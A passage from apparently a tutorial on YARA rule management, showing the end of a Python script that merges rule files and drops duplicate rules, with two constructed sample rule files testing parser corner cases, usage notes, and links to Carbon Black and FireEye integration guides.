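# Constructed sample rule files (not Valhalla rules) exercising the corner cases.
SAMPLE_A = '''import "pe"
// a comment mentioning rule Fake_Rule { must be ignored
rule Demo_One
{
    meta:
        description = "brace } inside a string"
    strings:
        $s = "}"
        $h = { 4D 5A }
        $r = /"[^"]+"/
    condition:
        uint16(0) == 0x5A4D and any of them
}

private rule Demo_Two { condition: true }
'''
SAMPLE_B = '''import "pe"
import "hash"
/* older copy of Demo_One, must be dropped as a duplicate */
rule Demo_One { condition: false }
rule Demo_Three : supply_chain
{
    condition:
        Demo_One and hash.md5(0, filesize) != ""
}
'''

if __name__ == "__main__":
    if len(sys.argv) == 3:   # usage: python merge_yara.py <rule_dir> <merged.yar>
        n_files, dups = merge_rule_files(sys.argv[1], sys.argv[2])
        print(f"merged {n_files} files, dropped {len(dups)} duplicate rules")
        for rule_name, origin in dups:
            print(f"  duplicate {rule_name} in {origin}")
    else:                    # no arguments: demonstrate on the in-line samples
        merged, dups = merge_rule_texts([("a.yar", SAMPLE_A), ("b.yar", SAMPLE_B)])
        print(merged)
        print("dropped:", dups)
```

Run without arguments to see the merge of the two sample files; with a rule directory and an output path it produces the file to upload. Review the dropped list before uploading: two rules with the same name but different bodies usually mean an updated rule has been downloaded next to a stale copy, and the script keeps whichever file sorts first.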

Carbon Black

Tutorial: https://github.com/carbonblack/cb-yara-connector

FireEye EX

Tutorial: https://www.fireeye.com/blog/products-and-services/2018/12/detect-and-block-email-threats-with-custom-yara-rules.html